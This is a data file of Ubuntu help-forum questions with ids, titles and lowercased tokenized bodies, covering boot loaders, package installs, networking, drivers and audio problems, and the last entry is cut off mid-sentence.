277689	dual boot windows 8 and ubuntu : grub works , ubuntu boots , windows 8 does n't	i had win8 installed on my computer and needed to install ubuntu , so i took a distro and created a live usb pen and installed it . everything went fine , well not at first because my computer comes with secure boot , but in the end it was done 0 errors . i have grub working now with ubuntu and windows 8 options . i ran boot-repair to fix my problem and it just added another windows 8 option to boot ( one on sda3 another on sda4 ) . so the probem is : in either windows 8 grub options , it starts to load normally , then when it should appear the login screen , a blue screen comes up and says a problem occurred and it reboots . i hope you can help , thank you for your time ! ps . : i had the exact same problem when i was trying to install ubuntu and i solved it by deleting the partitions where i was supposed to install ubuntu . now i do n't want to do it because ubuntu is now successfully installed in those partitions ( ext4 + swap )
277693	what to do if 'sudo make install ' does not work for tar.gz files ?	i downloaded the galaxium chat client tar.gz package from google code repositories . but , i am not able to install it with normal sudo make install command as described in the instructions , it gives an error : make : *** no rule to make target `install ' . stop . how can i fix this ? content of makefile.am : subdirs = build src docs assembly_wrapper = galaxium assembly_wrapper_in = galaxium.in pc_files = pc_files_in = bin_scripts = $ ( assembly_wrapper ) all : desktopdir = $ ( datadir ) /applications desktop_data = galaxium.desktop pixmapdir = $ ( datadir ) /pixmaps pixmap_data = galaxium.png galaxium_launch_setup= \ cd build & & \ mozilla_five_home= $ ( mozilla_home ) \ ld_library_path=`echo `` $ ( ld_library_path ) : $ ( mozilla_home ) '' | sed 's/^ : //g'` \ pkg_config_path=`echo `` $ ( pkg_config_path ) : $ ( md_pkg_config_path ) '' | sed 's/^ : //g'` galaxium_launch= $ ( galaxium_launch_setup ) exec -a `` galaxium '' mono run : rungalaxium rungalaxium : $ ( program ) $ ( galaxium_launch ) -- debug galaxium.startup.exe extra_dist = $ ( bin_scripts ) $ ( desktop_data ) $ ( pixmap_data ) distcleanfiles = $ ( bin_scripts )
277695	is it neccesary to delete the partitions before reinstalling ubuntu 12.10	i am having problems using gparted to turn off swap on the swap drive to move though this re installation guide
277700	connecting to aes encrypted wireless network	trying to connect my laptop to my university network which uses wpa2 enterprise and aes encryption , however the wireless connection does n't have aes encryption option . i ca n't get it connected at all , there 's a guide to connect in windows which is listed here : http : //studentprojects.wordpress.com/2012/02/17/73/ . could someone guide me ?
277706	choose the right step-by-step guide , based on your current operating system	i am confused ... so i am trying to install ubuntu on a netbook that has been plagued by viruses . the confusion i have is ... i currently have an imac that i am using to download ubuntu . i then want to mount ubuntu onto a flash drive from my imac and then install it on the netbook . however , i am not sure if i follow the instruction guide for the os of the netbook ( windows xp ) or the imac i am using to download and convert it to the flash drive . thanks ! !
277708	i downloaded ruby on rails , but it says it is n't installed .	i downloaded ruby on rails on ubuntu 12.10 through this tutorial http : //technical-feeds.blogspot.ca/2013/02/how-to-install-ubuntu-and-ruby-on-rails.html . i did everything and it worked fine . i checked ruby -v and it came back as ruby 2.0.0p0 . i also checked rails , rubygems and git they came back good . then i closed the terminal and opened a new one and tried to check the version but this came back for ruby bimbola @ ubuntu : ~ $ ruby -v the program 'ruby ' can be found in the following packages : * ruby1.8 * ruby1.9.1 try : sudo apt-get install and this came for rails bimbola @ ubuntu : ~ $ rails -v the program 'rails ' can be found in the following packages : * rails * ruby-railties-3.2 try : sudo apt-get install git is still fine though bimbola @ ubuntu : ~ $ git -- version git version 1.7.10.4
277709	activate office 2010 running in playonlinux with a kms server	is it possible to activate a volume licensed copy of microsoft office installed using playonlinux with my organisation 's key management server ? the installation with playonlinux worked flawlessly but the not long afterwards the activation notification pops up with `` error 0x8007232b '' in the bottom left corner http : //support.microsoft.com/kb/929826 informing that the kms services host was not found . ( note : i would love to exclusively use libreoffice but unfortunately it 's the usual story : i have to collaboratively work on documents with complex tables and figures shared with microsoft office users , despite being able to save in the same file formats these figures are invariably interpreted differently by the various office applications . )
277711	how do i clear out log files and such	i have 9.5 gb of log files and would like to clear them from my system and keep that much stuff from being created , how do i do this ? here is the output from sudo du -sh /var/* ~/.xsession-errors : 13m /var/backups 204m /var/cache 112m /var/crash 4.0k /var/games 503m /var/lib 4.0k /var/local 0 /var/lock 9.5g /var/log 85m /var/mail 4.0k /var/metrics 24k /var/opt 0 /var/run 1.7m /var/spool 391m /var/tmp 11g /var/tvmobili 20k /var/www 224k /home/school/.xsession-errors
277714	is there a `` super '' break key for bash ?	when using terminal sometimes you need to break the program . sometimes you press ctrl-c sometimes ctrl-x and sometimes ctrl-z in some circumstances , it might simply be closing a quote or pressing enter a few times there are even instances when ctrl-d will work . so when i get stuck , like an idiot , i start mashing those keys like an idiot in the hope that the process will quit . in 95 % of the cases it works and when i get desperate i just close the terminal and that works 100 % of the time . i 'm sure there is a logical reason for the various states due to the program being in a particular state but all i want to do is just break the application and return to the bash prompt . is there a super key that will break the process without having to mash these 4 magic keys in the hope that the application will terminate ?
277715	after swapping ctrl and caps in xmodmap , how can i make ctrl work properly for multi-modifier combinations ?	i 've swapped left ctrl and caps lock by creating ~/.xmodmap keycode 66 = control_l keycode 37 = caps_lock clear lock clear control add lock = caps_lock add control = control_l control_r then running $ xmodmap ~/.xmodmap . pressing the left ctrl key works as expected , toggling caps lock . pressing the caps lock key works in general for simple shortcuts , such as ctrl+n . however , when multiple modifier keys are required ( e.g . alt+ctrl+i ) , this only works if i press the alt key first . if i press the caps lock key first , there is no effect . i can reset the keyboard layout with $ setxkbmap -layout us , and the above shortcut will work fine . if i run $ xmodmap ~/.xmodmap again , i have the same problem . i also find that even for single-modifier combinations , i have to hold down the caps lock key for a split-second longer than i used to with the vanilla ctrl key for it to register . it 's probably of the order of 0.01 seconds , but it 's noticeable enough that incorrect signals are being sent one in ten times . also , if i swap ctrl and caps lock using $ setxkbmap -layout us -option 'ctrl : swapcaps ' , i no longer notice the problem with the multiple modifiers . however , i still want to work out the problem with the xmodmap solution , as i 'm getting a new keyboard soon , and will need to swap ctrl with a different key . =edit= i 've tried another keyboard ( das keyboard ) and it seems that the second problem of having to hold down caps lock for a split second longer than i did with ctrl is probably a hardware issue with the original keyboard ( an aluminium apple wired keyboard ) . however , the first problem with multiple modifiers is still present . =edit= i 've tested different keystrokes in xev . holding alt then pressing the caps lock key results in keycode 66 ( keysym 0x0 , nosymbol ) , as opposed to keycode 66 ( keysym 0xffe3 , control_l ) when alt is not held .
277716	unable install rails in ubuntu 12.10	i am trying to install rails in my ubuntu 12.10 , but i am unsuccessful in doing it . i am getting the error about packages . here is the sample exmple e : unable to locate package libsql what i did was , i installed ubuntu recently along side of windows7 . i going through these e : w : n : package errors . i dont know what sort of errors are these . please help !
277718	removing grub and mbr	i installed ububtu 12.04lts as dual boot along with my windows 7 . i need to remove grub and restore windows mbr but without uninstalling ubuntu
277723	managing windows virtual machines remotely	i have a very abstract and possibly naive question , nevertheless i am putting it up - i want to develop a ubuntu lab in an institute , using a client server model . i want the individual clients to have windows 7 virtual boxes or some other application for virtual machine access . the problem i foresee is maintenance of windows vms . how can we remotely manage , i.e . install uninstall monitor disinfect , windows virtual machines on individual clients through ubuntu server ? if someone can point me to relevant documentation , it will be great . thanks ! !
277731	how to run topcoder arena applet using proxy in ubuntu 12.10 ?	i was trying to run topcoder arena applet using proxy . i install latest jdk and iced-tea . when i try to run using : javaws contestappletprod.jnlp i 'm getting : file can not be launched because offline-allowed tag not specified and system currently offline . i tried setting proxy in icedtea applet but still getting the same error .
277736	regenerate /etc/default/grub	i accidentally wiped /etc/default/grub with a mistyped : w ! sudo tee % . is there a way to regenerate it 's content ? is the original available somewhere to copy ?
277737	the system freezes sometimes/randomly , when i browse a html5/css3 website in chrome	my laptop has intel b960 ( 2.2ghz x 2 ) with 4 gb ram . os is ubuntu 12.04 with all updates to current date . i am getting a peculiar issue since about 2 weeks - when i browse a html5/css3 website in chrome , sometimes ( randomly ) the system freezes - mouse , keyboard nothing seems to work . ctrl-alt-del would n't work . the mouse pointer moves but clicking does n't do anything . there is no such issue in firefox . only chrome on ubuntu has the problem .
277742	which free software can you use to create rotating 3d spacefill models of molecules in .gif format ?	an example of what i 'm talking about is this animation from wikipedia . i am running 32 bit 12.10 if it is relevant . please describe step-by-step , with pictures ( screenshots with the appropriate areas ( that are mentioned in the text ) highlighted ) how i am to create these gif files with the software you name .
277743	apport-gpu-error-intel.py in 12.10	the same error as described here appears again in ubuntu 12.10 . i get it several times a day . xdiagnose 3.2.3 is installed . here is a screenshot of the details : hope you can help . if you need any more details , just comment and i will add them .
277748	installing eclipse with java and cdt	long story short , my computer got a virus yesterday and when i tried to re-image the computer , i accidentally wiped out windows . while i 'm waiting for a windows 8 oem disc to get here in the mail , i decided to tinker around in ubuntu 12.04 lts . i 've been teaching myself a little c++ lately , and on windows , for lack of a better option , i just was using visual studio c++ express 2010 . obviously , i could n't use this ide on ubuntu , so i tried to install eclipse . i wanted it to be able to compile both java and c++ applications , so first i installed eclipse-java-juno-sr2-linux-gtk.tar.gz from http : //www.eclipse.org/downloads/ ( it was the 3rd from the top . ) everything compiled and ran just fine in the java perspective . when i tried to install the c/c++ developer tools , things started going awry . first i tried installing the plugin from the help > add new software ... menu . it said everything downloaded correctly , and after restarting eclipse , my hello world program failed with the error launch failed . binary not found . this error was really cryptic , and did n't even give me an error number , so i tried removing eclipse and re-installing eclipse again , this time the option with cdt built in : eclipse-cpp-juno-sr2-linux-gtk.tar.gz , again from http : //www.eclipse.org/downloads/ . this time when everything started up , i tried running a hello world program , but it underlined all of my std 's and cout 's with an error saying something was unresolved ( i do n't remember what it said exactly because i have since taken the cdt version back off and re-installed the java version , which still works fine . also , at some point along the way i was having this error : eclipse juno c++ error : program `` g++ '' not found in path which i never managed to solve before i uninstalled back to just having java support . i could really use some help here , and if you could explain some of the in-depth linux jargon that you use , that 'd be great too as i 've only been using ubuntu for less than 36 hours .
277750	ubuntu 13.04 wo n't boot from usb - missing operating system	i tried unetbootin and pendrive , and nothing helps . after i choose usb from boot menu error message ( missing operating system ) appears for a sec and continue to boot other system on hdd , in my case windows 7 . do i have to wait final release or this can be fixed ? thanks .
277756	how do i delete all packages which match a certain pattern ?	i want to uninstall libreoffice . this program consists of about three dozen modules . ideally , they could be removed with : aptitude remove libreoffice3.6* libreoffice-debian-menus libobasis3.6-* but that fails with could n't find any package whose name or description matched `` libreoffice3.6* '' etc . how do i delete a set of packages by pattern ? ps : i 'm happy about answers with use dpkg or apt , too
277758	after starting a particular lxc container with a static ip , no default gateway route is configured	i 've got one lxc container that works just fine , but a 2nd one now is mis-behaving . i 've configured a static route for it , but it just wo n't define a gateway after sudo services networking restart or after a reboot now , or lxc-restart ... , same for the dns servers . just the ip gets set ( which is defined in the lxc containers config file ) . it can ping the default gateway ( 10.1.0.1 ) just fine , but just does n't set the default gateway route or nameservers . davidparks21 @ webapp : ~ $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 10.1.3.10 netmask 255.255.0.0 broadcast 10.1.255.255 gateway 10.1.0.1 dns-nameservers 8.8.8.8 dns-nameservers 8.8.4.4 davidparks21 @ webapp : ~ $ route kernel ip routing table destination gateway genmask flags metric ref use iface 10.1.0.0 * 255.255.0.0 u 0 0 0 eth0 lxc.network.type=veth lxc.network.name=eth0 lxc.network.link=br0 lxc.network.ipv4 = 10.1.3.10/16 lxc.network.flags=up lxc.rootfs = /var/lib/lxc/webapp/rootfs lxc.utsname = prodweb1 root @ webapp : /var/log # ifdown eth0 & & ifup eth0 ifdown : interface eth0 not configured rtnetlink answers : file exists failed to bring up eth0 . note : on the other lxc container that does work , this command succeeds . adding this note : root @ webapp : /var/log # ethtool eth0 settings for eth0 : supported ports : [ ] supported link modes : not reported supported pause frame use : no supports auto-negotiation : no advertised link modes : not reported advertised pause frame use : no advertised auto-negotiation : no speed : 10000mb/s duplex : full port : twisted pair phyad : 0 transceiver : internal auto-negotiation : off mdi-x : unknown link detected : yes i think the question should really be , `` why is n't eth0 getting configured when i reboot or run service networking restart '' root @ webapp : /var/log # ls /run/network/ ifstate ifup.lo root @ webapp : /var/log # ifconfig eth0 link encap : ethernet hwaddr ee:1d : b6 : c7:8d:3d inet addr:10.1.3.10 bcast:10.1.255.255 mask:255.255.0.0 inet6 addr : fe80 : :ec1d : b6ff : fec7:8d3d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:196 errors:0 dropped:0 overruns:0 frame:0 tx packets:15 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:70482 ( 70.4 kb ) tx bytes:1174 ( 1.1 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:48 errors:0 dropped:0 overruns:0 frame:0 tx packets:48 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3840 ( 3.8 kb ) tx bytes:3840 ( 3.8 kb )
277759	usb external drive not opened any more	i 'm having a problem to access an external usb hard drive in ubuntu 12.04 . i had been succesfully using this hd both at work and home in my two ubuntu 12.04 computers . i had to add the following line to /etc/fstab to get the hd working /dev/sdc1 /media/freecomhdd vfat defaults , user , exec , uid=1000 , gid=1000 , umask=000 0 0 it has been working fine for months but now the usb disk does not appear anywhere in my system . if i try to mount i get an error message telling that the device does not exist sudo mount -t vfat /dev/sdc1 /media/freecomhdd mount : el dispositivo especial /dev/sdc1 no existe ( does not exist ) should i try to fix/check with fsck ? i am cautious with repairing disks as i do n't want to loose the data in the disk . any help would be appreciated . thanks in advance output of lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 011 : id 07ab : fcd4 freecom technologies output of lsusb -v ( just freecom hdd ) bus 001 device 004 : id 07ab : fcd4 freecom technologies device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x07ab freecom technologies idproduct 0xfcd4 bcddevice 0.00 imanufacturer 1 freecom iproduct 2 freecom hd quattro iserial 3 200000001013 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 5 f bmattributes 0xc0 self powered maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 4 interface0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0001 self powered output of dmesg | tail : [ 87571.668885 ] fat-fs ( sdc1 ) : directory bread ( block 502 ) failed [ 87571.668889 ] fat-fs ( sdc1 ) : directory bread ( block 503 ) failed [ 87571.668893 ] fat-fs ( sdc1 ) : directory bread ( block 504 ) failed [ 87571.668898 ] fat-fs ( sdc1 ) : directory bread ( block 505 ) failed [ 87571.668902 ] fat-fs ( sdc1 ) : directory bread ( block 506 ) failed [ 87571.668906 ] fat-fs ( sdc1 ) : directory bread ( block 507 ) failed [ 87571.668910 ] fat-fs ( sdc1 ) : directory bread ( block 508 ) failed [ 87571.668915 ] fat-fs ( sdc1 ) : directory bread ( block 509 ) failed [ 87571.668919 ] fat-fs ( sdc1 ) : directory bread ( block 510 ) failed [ 87571.668923 ] fat-fs ( sdc1 ) : directory bread ( block 511 ) failed [ 87571.668927 ] fat-fs ( sdc1 ) : directory bread ( block 512 ) failed [ 87571.668932 ] fat-fs ( sdc1 ) : directory bread ( block 513 ) failed [ 87571.668936 ] fat-fs ( sdc1 ) : directory bread ( block 514 ) failed [ 87571.668940 ] fat-fs ( sdc1 ) : directory bread ( block 515 ) failed [ 87571.668944 ] fat-fs ( sdc1 ) : directory bread ( block 516 ) failed [ 87571.668949 ] fat-fs ( sdc1 ) : directory bread ( block 517 ) failed [ 87571.668953 ] fat-fs ( sdc1 ) : directory bread ( block 518 ) failed [ 87571.668957 ] fat-fs ( sdc1 ) : directory bread ( block 519 ) failed [ 87572.244044 ] ... ... ... [ 87581.268713 ] usb 1-4 : usb disconnect , device number 9 [ 87581.316060 ] .ready [ 87581.316209 ] sd 6:0:0:0 : [ sdd ] read capacity failed [ 87581.316213 ] sd 6:0:0:0 : [ sdd ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 87581.316219 ] sd 6:0:0:0 : [ sdd ] sense not available . [ 87581.316242 ] sd 6:0:0:0 : [ sdd ] write protect is off [ 87581.316247 ] sd 6:0:0:0 : [ sdd ] mode sense : 00 06 04 52 [ 87581.316266 ] sd 6:0:0:0 : [ sdd ] asking for cache data failed [ 87581.316272 ] sd 6:0:0:0 : [ sdd ] assuming drive cache : write through [ 87581.318332 ] sd 6:0:0:0 : [ sdd ] read capacity failed [ 87581.318339 ] sd 6:0:0:0 : [ sdd ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 87581.318344 ] sd 6:0:0:0 : [ sdd ] sense not available . [ 87581.318379 ] sd 6:0:0:0 : [ sdd ] asking for cache data failed [ 87581.318384 ] sd 6:0:0:0 : [ sdd ] assuming drive cache : write through [ 87581.318388 ] sd 6:0:0:0 : [ sdd ] attached scsi disk [ 87747.212061 ] usb 1-4 : new high-speed usb device number 10 using ehci_hcd [ 87747.456347 ] hub 1-0:1.0 : unable to enumerate usb device on port 4 [ 87761.124078 ] usb 1-4 : new high-speed usb device number 11 using ehci_hcd [ 87761.277470 ] scsi7 : usb-storage 1-4:1.0 [ 87762.280987 ] scsi 7:0:0:0 : direct-access ext hard disk pq : 0 ansi : 4 [ 87762.286993 ] sd 7:0:0:0 : attached scsi generic sg4 type 0 [ 87762.289102 ] sd 7:0:0:0 : [ sdc ] spinning up disk ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .not responding ... [ 87863.094041 ] sd 7:0:0:0 : [ sdc ] read capacity failed [ 87863.094049 ] sd 7:0:0:0 : [ sdc ] result : hostbyte=did_ok driverbyte=driver_sense [ 87863.094055 ] sd 7:0:0:0 : [ sdc ] sense key : not ready [ current ] [ 87863.094061 ] sd 7:0:0:0 : [ sdc ] add . sense : logical unit not ready , cause not reportable [ 87863.097542 ] sd 7:0:0:0 : [ sdc ] test wp failed , assume write enabled [ 87863.100543 ] sd 7:0:0:0 : [ sdc ] asking for cache data failed [ 87863.100551 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through [ 87863.108776 ] sd 7:0:0:0 : [ sdc ] spinning up disk ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... output of sudo fdisk -l : disco /dev/sda : 40.0 gb , 40020664320 bytes 255 cabezas , 63 sectores/pista , 4865 cilindros , 78165360 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 512 bytes tamaño e/s ( mínimo/óptimo ) : 512 bytes / 512 bytes identificador del disco : 0x000bbd08 dispositivo inicio comienzo fin bloques id sistema /dev/sda1 * 2048 74864639 37431296 83 linux /dev/sda2 74866686 78163967 1648641 5 extendida /dev/sda5 74866688 78163967 1648640 82 linux swap / solaris disco /dev/sdb : 320.1 gb , 320072933376 bytes 255 cabezas , 63 sectores/pista , 38913 cilindros , 625142448 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 512 bytes tamaño e/s ( mínimo/óptimo ) : 512 bytes / 512 bytes identificador del disco : 0x00000000 dispositivo inicio comienzo fin bloques id sistema /dev/sdb1 63 625105214 312552576 83 linux
277760	what file or folder contains the contents for the dash ?	i have deinstalled a package ( epiphany ) which showed up thrice in the dash . now , one of the application-icons is gone , yet two remain . i want to know where to start looking into this problem : how does the dash application-lense determine its contents ? and where ( if at all ) is that saved or cached ? lsof -c unity and the likes , may list the file ( s ) or folder i am looking for , but wading through all that content is just too much work : )
277762	boot a drbl live via pxe	i 'm running a fog server and added many hacks to my pxe menu but now i want to add drbl live but it does n't work i tried that with this pxe configuration label fog.drbl menu passwd $ 1 $ b1e5ld/w $ nrekalrkmtrfofb4zjc7l1 kernel fog/drbl/live/vmlinuz boot=live config nomodeset vga=785 ip=frommedia nosplash append initrd=fog/drbl/live/initrd.img menu label drbl live text help start live drbl server with clonezilla live & clonezilla server options endtext i get initrd.img and vmlinuz from the iso of drbl live and the parameters from the grub configurations in there $ drbliso/efi/boot/grub.cfg . when booting to drbl option i get the following errors : dprobe : module unknown not found in modules.dep dprobe : module unknown not found in modules.dep dprobe : module unknown not found in modules.dep dprobe : module unknown not found in modules.dep dprobe : module unknown not found in modules.dep dprobe : module unknown not found in modules.dep dprobe : module unknown not found in modules.dep dprobe : module unknown not found in modules.dep dprobe : module swap not found in modules.dep can anyone see what 's wrong here ?
277789	unclaimed memory and coprocessor	i have ubuntu 12.10 and asus k70io . my memory and coprocessor are unclaimed . *-memory:0 unclaimed description : ram memory product : mcp79 memory controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:00:00.1 version : b1 width : 32 bits clock : 66mhz ( 15.2ns ) capabilities : bus_master configuration : latency=0 *-memory:1 unclaimed description : ram memory product : mcp79 memory controller vendor : nvidia corporation physical id : 3.1 bus info : pci @ 0000:00:03.1 version : b1 width : 32 bits clock : 66mhz ( 15.2ns ) configuration : latency=0 *-memory:2 unclaimed description : ram memory product : mcp79 memory controller vendor : nvidia corporation physical id : 3.3 bus info : pci @ 0000:00:03.3 version : b1 width : 32 bits clock : 66mhz ( 15.2ns ) configuration : latency=0 *-processor unclaimed description : co-processor product : mcp79 co-processor vendor : nvidia corporation physical id : 3.5 bus info : pci @ 0000:00:03.5 version : b1 width : 32 bits clock : 66mhz capabilities : bus_master configuration : latency=0 maxlatency=1 mingnt=3 resources : memory : f7f80000-f7ffffff mcp79 is my laptop 's chipset so i conclude that chipset is n't installed correctly . what should i do ?
277793	getting `` server certificate verification failed '' during apt-get update	i am trying to update a system using an https package mirror located here : https : //mirror.ufs.ac.za/os/linux/distros/ubuntu/ubuntu/ however , during apt-get update , i get the following message : packages server certificate verification failed . cafile : /etc/ssl/certs/ca-certificates.crt crlfile : none if you visit the site in your browser , you are warned about the site 's certificate , but i trust the site , so it 's not an issue for me . i assume i must be able to add this exception somewhere for apt to proceed . can you tell me where and how ?
277794	'apt-get update ' fails when using proxy	using apt-get update i am getting err http : //ppa.launchpad.net precise/main amd64 packages 404 not found w : failed to fetch http : //ppa.launchpad.net/webupd8team/jupiter/ubuntu/dists/precise/main/binary-amd64/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . the machine is behind proxy and proxy is configures correctly and the error is not coming for other packages fetched from the internet . it is more common with ppas . never got a problem with other sources . had the problem with : deb http : //_ppa.launchpad.net/rabbitvcs/ppa/ubuntu precise main deb [ arch=amd64 ] http : __ppa.launchpad.net/webupd8team/jupiter/ubuntu precise main also tried using acquire : :http { no-cache=true ; } ; and treid cleaning the cache of list sudo rm /var/lib/apt/lists/* nothing worked out . the url that fails opens perfectly in browser or using wget . this problem only happens when using proxy .
277802	why my rule in udev/rules.d does not set the mode and group	jardag @ precise-gib : ~ $ lsusb bus 001 device 006 : id 15ba:002a olimex ltd. arm-usb-tiny-h jtag interface jardag @ precise-gib : ~ $ cd /dev/bus/usb crw-rw-r -- 1 root root 189 , 0 apr 4 21:13 001 crw-rw-r -- 1 root root 189 , 5 apr 4 21:13 006 jardag @ precise-gib : /dev/bus/usb/001 $ cat /etc/udev/rules.d/40* subsystems== '' usb '' , attrs { idvendor } == '' 0x15ba '' , attrs { idproduct } == '' 0x002a '' , mode= '' 0660 '' , group= '' lp '' why the mode and group of the 006 did not change ?
277803	how to install/update libnl-1.0pre8 ( or later )	i was trying to share my laptop 's internet over wireless to use as wi-fi in my android phone . after googling for some time i am now stuck here : http : //linuxwireless.org/en/users/documentation/hostapd the instruction says : `` you need to install/update libnl-1.0pre8 ( or later ) '' for a certain error i am getting . but i am unable to do so . i downloaded the package all right , but executing the makefile of that package is giving me errors . is there another way to install/update this application ? please help .
277804	how to install driver for ati rage 128 pro ultra tf ?	this is the driver in question , it promises to be the end of my graphics troubles with my old rage 128 card . http : //www.phoronix.com/scan.php ? page=news_item & px=mta5mzk the only trouble is , i 'm not sure how to install the driver ? i 'm running ununtu 12.04 .
277805	why does my internet speed roughly *double* when switching from ubuntu to win xp ?	from the same ethernet-socket from the same machine ( ibm thinkpad x41 ) i get > 40 mbps from win xp ~ 18 mbps from ubuntu apart from the fact that i 'm officially paying for 50 mbps and that for most intents and purposes anything above 10 mbps is `` good enough '' for me , why does my internet speed roughly double if i boot win xp ? note : i 'm not using wifi in this setup . could it be a driver / firmware issue ? if so , how to check ? my router 's got the latest firmware . my modem 's brand new ( mfg a year ago in a chinese sweatshop for cisco ) and from what i can tell the firmware 's up-to-scratch here , too . in win xp , the latest updates are installed from micro $ oft and from the lenovo `` thinkvantage '' system update tool . ubuntu software center has all the latest ( lts ) updates installed . i also connected it to the modem directly : internet on ubuntu was as slow ( or even slower ) than when connected through the router . currently , there are no other devices connected to the router and currently online ( i.e. , the bandwidth is currently not being shared ; and no , this router does not support wifi ) . which drivers and/or settings could i possible ( and sensibly and safely ) tweak within ubuntu ? for older q & a 's see , for instance : internet slow on ubuntu but not windows ubuntu restricting download speed to 15kbps why is my download speed slow on ubuntu 11.10 ? ubuntu 11.10 network speed slow internet browsing in ubuntu note that i did n't yet test the suggestions on how to check internet speed via terminal ? but instead relied ( for now ) on the ( seemingly quite reliable ) speedtest.net . edit do n't take the above values as carved in stone . i do not claim to have performed robust , standardized or extensive benchmark testing . there is significant measurement error involved , which ( to my knowledge ) can not be avoided entirely . i shall update my findings , if i happen to discover or test something new . in particular , i shall keep an eye out for the top speed reached surfing with ubuntu ( relative to > 40 mbps with win xp ) on this machine/network .
277806	how to set java home ?	can any one tell me , how to set java home in ubuntu 12.10 ?
277809	12.04 , 12.10 : networkmanager fails to autoconfigure ipv6	yep , precisely as the subject line says . in lan in question we 've tried mac os x , windows 7 , ubuntu and archlinux . everything except ubuntu ( what a shame ! ) works flawlessly , i. e. gets an ip ( v6 ) . actually i managed to get ipv6 address autoconfigured on ubuntu when turned networkmanager off and used auto config in /etc/network/interfaces so , what is it and what is more important â is there any solution ?
277819	how to add alx support to recent mainline kernel ?	apparently mainline kernel 3.8.5 is compiled without support for recent atheros communications inc. ar8161 gigabit ethernet card . i know it is supplied in recent kernels with the module name alx . compilation of enter link description here the backporting mechanism does n't work here since and it fails during compiling ( and no wonder , since it is written that it is compatible with no later than 3.6 kernels ) . i could use compat-drivers , but they fail to build . what are my options ( except from recompiling the whole kernel ) to add alx module ? ( i need a recent kernel because i 'm playing with btrfs ) . btw i use asus n56vz notebook . update : the https : //github.com/erikarn/alx did compile , but it did n't install the driver . ( no errors in process , but ultimately no network eighter . i did put sudo make linux-install after compilation . but after reboot the the alx module is still not present . )
277826	google music app keeps closing	i 'm trying to upload about 6,000 songs to google music on my kubuntu 12.10 laptop and the google music manager upon launch shows up in my taskbar for a bit and then disappears . i can relaunch it and the app will start , show up in my task tray for about 10 minutes ( upload a couple of songs ) and then disappear . once it disappears it seems like the upload stops . chrome shows 400 of 6k+ songs uploaded for a bit but never seems to finish uploading hte song until i relaunch the app . i did some googling and found a suggestion of going into my ~/.config/ directory and removing the google-musicmanager directory which i did and after doing so recreated all my settings but the issue stays . any ideas ? i did read the `` google music manager stops downloading after a while question '' that was asked as a similar question but that did not answer things . thanks in advance
277828	uninstall apps installed with gnome3	i have installed gnome 3 desktop environment in ubuntu 12.04 and want to free some space by removing apps i do n't need . when i try to do so via software center , i get a warning that the gnome desktop environment must be removed as well . as i have seen here : what will happen if i remove `` essential components '' for gnome ? proceeding would indeed mess things up . so is there no safe way to remove those apps installed with gnome3 ?
277829	sound stopped working after using hdmi	so a couple of days ago , i had my laptop hooked up to my tv via hdmi . i used pavucontrol to disable sound on my laptop and play it through the tv . i changed it back when i was done . ca n't remember if i used it right away . last night i tried to use it and it did n't work . i opened pavucontrol again and switched to the configuration tab where there had previously been a drop down menu allowing me to choose what device to output my sound through . now there 's nothing . it says no card available for configuration . when i open asoundconf-gtk it only has `` pch '' and selecting that does nothing either . here is my output of pulseaudio -d http : //pastebin.com/75splihg and using the guide on the ubuntu wiki pulse audio page , i made a log http : //pastebin.com/rmarxumd i 've tried deleting the pulse folder from my home directory and restarting the server . after searching on google , i found similar problems required me to edit /etc/pulse/client.conf and make sure autospawn is set to yes and everything is commented out with a semicolon , which it is . tried using qasmixer to make sure sound is n't disabled . nothing works . . i 've tried posting on the ubuntu-forums.org site and got no help there so i 'm trying here because i dont want to reboot into win7 to stream videos or listen to my mp3s . since i do n't have reputation for more links , i 'll post in the comments for my client and daemon conf files . running lubuntu 12.10 with kernel 3.5.0-24-generic . i hope this is enough info . edit : july 29th/13 : i decided to create a new user account and everything shows up as normal in pavucontrol . i am able to see the sound card and adjust settings although i did n't actually test the sound . so this appears to be a user configuration error ( although if i run gksudo pavucontrol , i still cant access the sound card ) . i 've deleted ~/.pulse 